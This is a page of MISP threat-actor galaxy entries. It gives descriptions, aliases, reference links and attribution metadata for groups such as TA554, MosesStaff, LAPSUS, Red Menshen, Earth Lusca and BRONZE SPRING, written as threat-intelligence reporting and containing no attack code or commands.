Since May 2018, Proofpoint researchers have observed email campaigns using a new downloader called sLoad. sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries. While initial versions of sLoad appeared in May 2018, we began tracking the campaigns from this actor (internally named TA554) since at least the beginning of 2017.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA554.
Known Synonyms |
---|
TH-163 |
Internal MISP references
UUID 36f1a1b8-e03a-484f-95a3-005345679cbe
which can be used as unique global reference for TA554
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA555
Beginning in May 2018, Proofpoint researchers observed a previously undocumented downloader dubbed AdvisorsBot appearing in malicious email campaigns. The campaigns appear to primarily target hotels, restaurants, and telecommunications, and are distributed by an actor we track as TA555. To date, we have observed AdvisorsBot used as a first-stage payload, loading a fingerprinting module that, as with Marap, is presumably used to identify targets of interest to further infect with additional modules or payloads. AdvisorsBot is under active development and we have also observed another version of the malware completely rewritten in PowerShell and .NET.
Internal MISP references
UUID d0d26dae-195f-4503-a6a9-ebb1ec0e07f9
which can be used as unique global reference for TA555
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA800
This attacker is an affiliate distributor of The Trick, also known as Trickbot, and BazaLoader. (For more on how affiliates work, see the description of TA573.) TA800 has targeted a wide range of industries in North America, infecting victims with banking Trojans and malware loaders (malware designed to download other malware onto a compromised device). Malicious emails have often included recipients’ names, titles and employers along with phishing pages designed to look like the targeted company. Lures have included hard-to-resist subjects such as those related to payment, meetings, termination, bonuses and complaints in the subject line or body of the email.
Internal MISP references
UUID 75fac2e9-8f2c-4620-a1cc-4b8a61c1bb48
which can be used as unique global reference for TA800
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
MosesStaff
Cybereason Nocturnus describes Moses Staff as an Iranian hacker group, first spotted in October 2021. Their motivation appears to be to harm Israeli companies by leaking sensitive, stolen data.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MosesStaff.
Known Synonyms |
---|
DEV-0500 |
Marigold Sandstorm |
Moses Staff |
Internal MISP references
UUID d45dd940-b38d-4b2c-9f2f-3e4a0eac841c
which can be used as unique global reference for MosesStaff
in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/campuscodi/status/1450455259202166799 - webarchive
- https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/ - webarchive
- https://www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations - webarchive
- https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Avivore
The group’s existence came to light during Context’s investigation of a number of attacks against multinational enterprises that compromise smaller engineering services and consultancies working in their supply chains.
Internal MISP references
UUID 8045fc09-13d6-4f90-b239-ed5060b9297b
which can be used as unique global reference for Avivore
in MISP communities and other software using the MISP galaxy
External references
- https://www.computerweekly.com/news/252471769/New-threat-group-behind-Airbus-cyber-attacks-claim-researchers - webarchive
- https://www.contextis.com/en/news/context-identifies-new-avivore-threat-group - webarchive
- https://web.archive.org/web/20191208223958/https://www.contextis.com/en/blog/avivore - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
HAZY TIGER
The Bitter threat group initially started using RAT tools in their campaigns, as the first Bitter versions for Android, released in 2014, were based on the AndroRAT framework. Over time, they switched to a custom version that has been known as BitterRAT ever since.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HAZY TIGER.
Known Synonyms |
---|
APT-C-08 |
Bitter |
Orange Yali |
T-APT-17 |
Internal MISP references
UUID 1e9bd6fe-e009-41ce-8e92-ad78c73ee772
which can be used as unique global reference for HAZY TIGER
in MISP communities and other software using the MISP galaxy
External references
- https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf - webarchive
- https://mp.weixin.qq.com/s/8j_rHA7gdMxY1_X8alj8Zg - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
country | IN |
LAPSUS
An actor group conducting large-scale social engineering and extortion campaigns against multiple organizations, with some victims seeing evidence of destructive elements.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LAPSUS.
Known Synonyms |
---|
DEV-0537 |
LAPSUS$ |
SLIPPY SPIDER |
Strawberry Tempest |
Internal MISP references
UUID d9e5be22-1a04-4956-af6c-37af02330980
which can be used as unique global reference for LAPSUS
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ - webarchive
- https://blog.checkpoint.com/2022/03/07/lapsus-ransomware-gang-uses-stolen-source-code-to-disguise-malware-files-as-trustworthy-check-point-customers-remain-protected/ - webarchive
- https://www.crowdstrike.com/adversaries/slippy-spider/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Scarab
Scarab APT was first spotted in 2015, but is believed to have been active since at least 2012, conducting surgical attacks against a small number of individuals across the world, including Russia and the United States. The backdoor deployed by Scarab in their campaigns is most commonly known as Scieron.
Internal MISP references
UUID ef59014b-79bb-408f-97f1-3c585a240ca7
which can be used as unique global reference for Scarab
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Russia', 'Ukraine', 'United States'] |
cfr-type-of-incident | Espionage |
country | CN |
BladeHawk
Internal MISP references
UUID 0d72c57c-73e3-4739-8144-c8055cabd7dc
which can be used as unique global reference for BladeHawk
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Kurdistan'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
Copy-Paste
The title ‘Copy-paste compromises’, given by the Australian Government, is derived from the actor’s heavy use of tools copied almost identically from open source.
Internal MISP references
UUID 38d75c89-f243-45ee-87e7-e4675f0c53b3
which can be used as unique global reference for Copy-Paste
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Australia'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
Killnet
A group targeting various countries using denial-of-service attacks.
Internal MISP references
UUID ad2d6946-1ec2-4d77-b864-39980af4e103
which can be used as unique global reference for Killnet
in MISP communities and other software using the MISP galaxy
External references
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
- https://therecord.media/russia-or-ukraine-hacking-groups-take-sides/?msclkid=235244a7ba6611ec92f21c9bd3b8ee49 - webarchive
- https://www.expats.cz/czech-news/article/pro-russian-hackers-target-czech-websites-in-a-series-of-attacks - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['United States', 'Czech Republic'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Denial of service |
SaintBear
A group targeting Ukrainian (UA) state organizations using the GraphSteel and GrimPlant malware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SaintBear.
Known Synonyms |
---|
DEV-0587 |
FROZENVISTA |
Lorec53 |
Nascent Ursa |
Nodaria |
Saint Bear |
Storm-0587 |
TA471 |
UAC-0056 |
UNC2589 |
Internal MISP references
UUID c67d3dfb-ab39-46e1-a971-5efdfe6a5b9f
which can be used as unique global reference for SaintBear
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel - webarchive
- https://cert.gov.ua/article/38374 - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/ - webarchive
- https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/ - webarchive
- https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/nascentursa/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer - webarchive
- https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/ - webarchive
- https://circleid.com/posts/20230412-probing-lorec53-phishing-through-the-dns-microscope - webarchive
- https://nsfocusglobal.com/wp-content/uploads/2021/11/Analysis-Report-on-Lorec53-Group.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
UNC3524
Mandiant observed this group operating since December 2019. Its techniques partially overlap with multiple Russian-based espionage actors (APT28 and APT29). They are described as having a high level of operational security, low malware footprint, adept evasive skills, and a large Internet of Things (IoT) device botnet at their disposal.
Internal MISP references
UUID bee8b09c-07e5-4c12-94d6-266ebcb1ec24
which can be used as unique global reference for UNC3524
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-type-of-incident | Espionage |
Curious Gorge
Curious Gorge, a group TAG attributes to China's PLA SSF, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia. The actor has remained active against government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia. In Russia, long running campaigns against multiple government organizations have continued, including the Ministry of Foreign Affairs. Over the past week, TAG identified additional compromises impacting multiple Russian defense contractors and manufacturers and a Russian logistics company.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Curious Gorge.
Known Synonyms |
---|
UNC3742 |
Internal MISP references
UUID 6ee284d9-2742-4468-851c-a61366cc9a20
which can be used as unique global reference for Curious Gorge
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Ukraine', 'Russia', 'Kazakhstan', 'Mongolia'] |
cfr-target-category | ['Government', 'Military', 'Logistics', 'Defense Contractor'] |
cfr-type-of-incident | Espionage |
country | CN |
Red Menshen
Since 2021, Red Menshen, a China-based threat actor, has been observed targeting telecommunications providers across the Middle East and Asia, as well as entities in the government, education, and logistics sectors, using a custom backdoor referred to as BPFDoor. This threat actor uses a variety of tools in its post-exploitation phase. This includes custom variants of the shared tool Mangzamel (including Golang variants), custom variants of Gh0st, and open source tools like Mimikatz and Metasploit to aid in its lateral movement across Windows systems. They have also been seen sending commands to BPFDoor victims via Virtual Private Servers (VPSs) hosted at a well-known provider, and these VPSs, in turn, are administered via compromised routers based in Taiwan, which the threat actor uses as VPN tunnels. Most Red Menshen activity that has been observed took place between Monday and Friday (with none observed on the weekends), with most communication taking place between 01:00 and 10:00 UTC. This pattern suggests a consistent 8 to 9-hour activity window for the threat actor, with a realistic probability of it aligning to local working hours.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Red Menshen.
Known Synonyms |
---|
Red Dev 18 |
Internal MISP references
UUID bfe66711-32dc-4c1f-b78b-9b2f9e4c1525
which can be used as unique global reference for Red Menshen
in MISP communities and other software using the MISP galaxy
External references
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf - webarchive
- https://troopers.de/troopers22/talks/7cv8pz - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Middle East', 'Asia'] |
cfr-target-category | ['Government', 'Education', 'Logistics'] |
country | CN |
Cosmic Lynx
Cosmic Lynx is a Russia-based BEC cybercriminal organization that has significantly impacted the email threat landscape with sophisticated, high-dollar phishing attacks.
Internal MISP references
UUID 54ae5c75-8aab-41a8-971a-03d53db9b35c
which can be used as unique global reference for Cosmic Lynx
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-type-of-incident | Business Email Compromise |
ModifiedElephant
Our research into these intrusions revealed a decade of persistent malicious activity targeting specific groups and individuals that we now attribute to a previously unknown threat actor named ModifiedElephant. This actor has operated for years, evading research attention and detection due to their limited scope of operations, the mundane nature of their tools, and their regionally-specific targeting. ModifiedElephant is still active at the time of writing.
Internal MISP references
UUID 6cce6ecc-e6f5-4ae5-b8c5-cf633b7cf973
which can be used as unique global reference for ModifiedElephant
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-target-category | ['Civil Society'] |
EXOTIC LILY
EXOTIC LILY is a resourceful, financially motivated group whose activities appear to be closely linked with data exfiltration and deployment of human-operated ransomware such as Conti and Diavol. In early September 2021, the group was observed exploiting a 0day in Microsoft MSHTML (CVE-2021-40444). Investigation led researchers to believe that they are an Initial Access Broker (IAB) who appear to be working with the Russian cyber crime gang known as FIN12 (Mandiant, FireEye) / WIZARD SPIDER (CrowdStrike). This threat actor deploys tactics, techniques and procedures (TTPs) that are traditionally associated with more targeted attacks, like spoofing companies and employees as a means of gaining the trust of a targeted organization through email campaigns that are believed to be sent by real human operators using little-to-no automation. Additionally and rather uniquely, they leverage legitimate file-sharing services like WeTransfer, TransferNow and OneDrive to deliver the payload, namely BUMBLEBEE and BAZARLOADER, further evading detection mechanisms. This level of human interaction is rather unusual for cyber crime groups focused on mass-scale operations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EXOTIC LILY.
Known Synonyms |
---|
DEV-0413 |
Internal MISP references
UUID 3ce2a9e0-c435-402a-a7f3-d48b64d1ab9d
which can be used as unique global reference for EXOTIC LILY
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA578
TA578 is a threat actor that Proofpoint researchers have been tracking since May 2020. TA578 has previously been observed in email-based campaigns delivering Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, and Cobalt Strike.
Internal MISP references
UUID d1a8626a-06a5-4ecc-9519-e17fc6724f15
which can be used as unique global reference for TA578
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA579
TA579 is a threat actor that Proofpoint researchers have been tracking since August 2021. This actor frequently delivered BazaLoader and IcedID in past campaigns.
Internal MISP references
UUID 7ab283ac-b78f-42db-b564-0550b9637b0b
which can be used as unique global reference for TA579
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
RansomHouse
This group started operating during the first quarter of 2022. They published samples of alleged stolen data from companies on their site on Tor. It is unclear if they conducted the attacks themselves, or if they bought leaked databases from third parties.
Internal MISP references
UUID 4d522fad-452c-46be-94ea-5803aec9b709
which can be used as unique global reference for RansomHouse
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-target-category | ['Private sector'] |
ToddyCat
ToddyCat is responsible for multiple sets of attacks detected since December 2020 against high-profile entities in Europe and Asia. There is still little information about this actor, but its main distinctive signs are two previously unknown tools that Kaspersky calls the 'Samurai backdoor' and the 'Ninja Trojan'.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ToddyCat.
Known Synonyms |
---|
Websiic |
Internal MISP references
UUID 091a0b69-74de-44b6-bb12-16b7a8fd078b
which can be used as unique global reference for ToddyCat
in MISP communities and other software using the MISP galaxy
External references
- https://www.bleepingcomputer.com/news/security/new-toddycat-apt-group-targets-exchange-servers-in-asia-europe/ - webarchive
- https://securelist.com/toddycat/106799/ - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
- https://gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html - webarchive
- https://community.riskiq.com/article/d8b749f2 - webarchive
- https://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Afghanistan', 'India', 'Indonesia', 'Iran', 'Kyrgyzstan', 'Malaysia', 'Pakistan', 'Russia', 'Slovakia', 'Taiwan', 'Thailand', 'United Kingdom', 'Uzbekistan', 'Vietnam'] |
cfr-target-category | ['Military', 'Government'] |
POLONIUM
Microsoft successfully detected and disabled attack activity abusing OneDrive by a previously undocumented Lebanon-based activity group Microsoft Threat Intelligence Center (MSTIC) tracks as POLONIUM.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular POLONIUM.
Known Synonyms |
---|
GREATRIFT |
Plaid Rain |
UNC4453 |
Internal MISP references
UUID 3c5129ea-8f18-4bcf-a33b-b5aab0720494
which can be used as unique global reference for POLONIUM
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/ - webarchive
- https://www.deepinstinct.com/blog/polonium-apt-group-uncovering-new-elements - webarchive
- https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 75 |
cfr-suspected-state-sponsor | Lebanon |
cfr-suspected-victims | ['Israel'] |
cfr-target-category | ['Critical manufacturing', 'Defense industrial base', 'Financial services', 'Food and agriculture', 'Government agencies and services', 'Healthcare', 'Pharmaceuticals', 'Information technology', 'Transportation systems', 'NGOs', 'Civil Society', 'Military', 'Defense'] |
cfr-type-of-incident | Espionage |
country | LB |
Predatory Sparrow
A self-proclaimed hacktivist group that carried out attacks against Iranian railway systems and against Iranian steel plants.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Predatory Sparrow.
Known Synonyms |
---|
Gonjeshke Darande |
Indra |
Internal MISP references
UUID e665ac2f-87b4-4c2e-bef7-78bf0a8af87b
which can be used as unique global reference for Predatory Sparrow
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Iran'] |
cfr-target-category | ['Critical manufacturing', 'Transportation systems'] |
cfr-type-of-incident | Sabotage |
DEV-0586
MSTIC has not found any notable associations between this observed activity, tracked as DEV-0586, and other known activity groups. MSTIC assesses that the malware (WhisperGate), which is designed to look like ransomware but lacking a ransom recovery mechanism, is intended to be destructive and designed to render targeted devices inoperable rather than to obtain a ransom.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DEV-0586.
Known Synonyms |
---|
Cadet Blizzard |
Ruinous Ursa |
Internal MISP references
UUID a5f64c1a-c829-4855-903d-e0ff2098b2d7
which can be used as unique global reference for DEV-0586
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ - webarchive
- https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/ruinousursa/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Ukraine'] |
cfr-type-of-incident | Sabotage |
country | RU |
Kinsing
Kinsing is a financially motivated group, tracked by Unit 42 as Money Libra, named after the Linux malware it deploys. Its campaigns compromise exposed or misconfigured container and cloud services, such as open Docker daemon APIs and internet-facing applications with known vulnerabilities, to install a cryptocurrency miner, and the malware has been observed using a rootkit to hide its activity on infected hosts.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kinsing.
Known Synonyms |
---|
Money Libra |
Internal MISP references
UUID bc6f3b91-5a28-46df-9778-179218c809fe
which can be used as unique global reference for Kinsing
in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html - webarchive
- https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability - webarchive
- https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/moneylibra/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Earth Berberoka
According to Trend Micro, Earth Berberoka is a threat group originating from China that mainly focuses on targeting gambling websites. The group's campaign uses multiple malware families, targeting the Windows, Linux, and macOS platforms, that have been attributed to Chinese-speaking actors. Aside from using upgraded versions of tried-and-tested malware families such as PlugX and Gh0st RAT, Earth Berberoka has also developed a brand-new, complex, multistage malware family dubbed PuppetLoader.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Earth Berberoka.
Known Synonyms |
---|
GamblingPuppet |
Internal MISP references
UUID 9d82077b-7e95-4b22-8762-3224797ff5f0
which can be used as unique global reference for Earth Berberoka
in MISP communities and other software using the MISP galaxy
External references
- https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf - webarchive
- https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-macos-iocs-2.txt - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-domains-2.txt - webarchive
- https://www.youtube.com/watch?v=QXGO4RJaUPQ - webarchive
- https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf - webarchive
- https://securelist.com/diceyf-deploys-gameplayerframework-in-online-casino-development-studio/107723/ - webarchive
- https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['China', 'United States', 'Hong Kong', 'Malaysia', 'Taiwan'] |
cfr-target-category | ['Gambling Websites', 'Information technology', 'Electronics Manufacturers', 'Education'] |
country | CN |
Earth Lusca
Earth Lusca is a threat actor from China that targets organizations of interest to the Chinese government, including academic institutions, telecommunication companies, religious organizations, and other civil society groups. Earth Lusca's tools closely resemble those used by Winnti Umbrella, but the group appears to operate separately from Winnti. Earth Lusca has also been observed targeting cryptocurrency payment platforms and cryptocurrency exchanges in what are likely financially motivated attacks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Earth Lusca.
Known Synonyms |
---|
AQUATIC PANDA |
BRONZE UNIVERSITY |
BountyGlad |
CHROMIUM |
Charcoal Typhoon |
ControlX |
FISHMONGER |
Red Dev 10 |
Red Scylla |
RedHotel |
TAG-22 |
Internal MISP references
UUID 39150b30-61af-4d9c-9682-1595e145f3c1
which can be used as unique global reference for Earth Lusca
in MISP communities and other software using the MISP galaxy
External references
- https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf - webarchive
- https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi - webarchive
- https://media-exp1.licdn.com/dms/document/C561FAQHhWFRcWmdCPw/feedshare-document-pdf-analyzed/0/1639591145314?e=1658966400&v=beta&t=_uCcyEVg6b_VDiBTvWQIXtBOdQ1GQAAydqGyq62KA3E - webarchive
- https://www.sentinelone.com/wp-content/uploads/2021/08/SentinelOne_-SentinelLabs_ShadowPad_WP_V2.pdf - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html - webarchive
- https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools - webarchive
- https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf - webarchive
- https://securelist.com/apt-annual-review-2021/105127 - webarchive
- https://securelist.com/apt-trends-report-q2-2021/103517 - webarchive
- https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/jolly-jellyfish/NCSC-MAR-Jolly-Jellyfish.pdf - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/pdf/2022-year-in-retrospect-report.pdf - webarchive
- https://www.youtube.com/watch?v=-7Swd1ZetiQ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Australia', 'China', 'France', 'Germany', 'Hong Kong', 'Japan', 'Mongolia', 'Nepal', 'Nigeria', 'Philippines', 'Taiwan', 'Thailand', 'United Arab Emirates', 'United States', 'Vietnam'] |
cfr-target-category | ['Gambling companies', 'Government Institutions', 'Education', 'Media and Entertainment', 'Pro-democracy and human rights political organizations', 'Telecommunications', 'Religious organization', 'Cryptocurrency', 'Medical', 'Covid-19 research organizations'] |
country | CN |
Earth Wendigo
Earth Wendigo is a threat actor from China that has been targeting several organizations — including government organizations, research institutions, and universities in Taiwan — since May 2019, aiming to exfiltrate emails from targeted organizations via the injection of JavaScript backdoors to a webmail system that is widely used in Taiwan. The threat actor also sent spear-phishing emails embedded with malicious links to multiple individuals, including politicians and activists, who support movements in Tibet, the Uyghur region, or Hong Kong.
Internal MISP references
UUID c96e1329-cf7e-44ac-a3db-9e251dc98ec5
which can be used as unique global reference for Earth Wendigo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Hong Kong', 'Taiwan'] |
cfr-target-category | ['Government', 'Education'] |
country | CN |
BRONZE EDGEWOOD
In early 2021 CTU researchers observed BRONZE EDGEWOOD exploiting the Microsoft Exchange Server of an organization in Southeast Asia. The threat group deployed a China Chopper web shell and ran the Nishang Invoke-PowerShellTcp.ps1 script to connect back to C2 infrastructure. The threat group is publicly linked to the malware families Chinoxy, PCShare and FunnyDream. CTU researchers have discovered that BRONZE EDGEWOOD also leverages Cobalt Strike in its intrusion activity. BRONZE EDGEWOOD has been active since at least 2018 and targets government and private enterprises across Southeast Asia. CTU researchers assess with moderate confidence that BRONZE EDGEWOOD operates on behalf of the Chinese government and has a remit that covers political espionage.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BRONZE EDGEWOOD.
Known Synonyms |
---|
Red Hariasa |
Internal MISP references
UUID b4ce9385-eedf-4a71-803c-6d53a250d10b
which can be used as unique global reference for BRONZE EDGEWOOD
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Kyrgyzstan', 'Malaysia', 'Vietnam'] |
country | CN |
APT9
APT9 engages in cyber operations where the goal is data theft, usually focusing on the data and projects that make a particular organization competitive within its field. APT9 was historically very active in the pharmaceuticals and biotechnology industry. We have observed this actor use spearphishing, valid accounts, as well as remote services for Initial Access. On at least one occasion, Mandiant observed APT9 at two companies in the biotechnology industry and suspects that APT9 actors may have gained initial access to one of the companies by using a trusted relationship between the two companies. APT9 uses a wide range of backdoors, including publicly available backdoors, as well as backdoors that are believed to be custom but are used by multiple APT groups.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT9.
Known Synonyms |
---|
Group 27 |
NIGHTSHADE PANDA |
Red Pegasus |
Internal MISP references
UUID 7e6d82a4-3b7d-4c24-a2c5-e211ce6eafc5
which can be used as unique global reference for APT9
in MISP communities and other software using the MISP galaxy
External references
- https://otx.alienvault.com/pulse/55bbc68e67db8c2d547ae393 - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn - webarchive
- https://news.softpedia.com/news/trochilus-rat-evades-antivirus-detection-used-for-cyber-espionage-in-south-east-asia-498776.shtml - webarchive
- https://unit42.paloaltonetworks.com/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['United States'] |
cfr-target-category | ['Pharmaceuticals', 'Healthcare', 'Construction', 'Aerospace', 'Defense industrial base'] |
country | CN |
BRONZE SPRING
BRONZE SPRING is a threat group that CTU researchers assess with high confidence operates on behalf of China in the theft of intellectual property from defense, engineering, pharmaceutical and technology companies. The threat group typically uses scan-and-exploit for initial access, deploys the China Chopper web shell for remote execution and persistence, and creates RAR archives with a '.jpg' file extension for data exfiltration. In July 2020 the U.S. Department of Justice indicted two Chinese hackers whom CTU researchers assess are members of the BRONZE SPRING threat group. The Department of Justice alleges these hackers were responsible for compromising the networks of hundreds of organisations and individuals in the U.S. and abroad since 2009, and that exfiltrated data was passed to the Chinese Ministry of State Security or sold for financial gain.
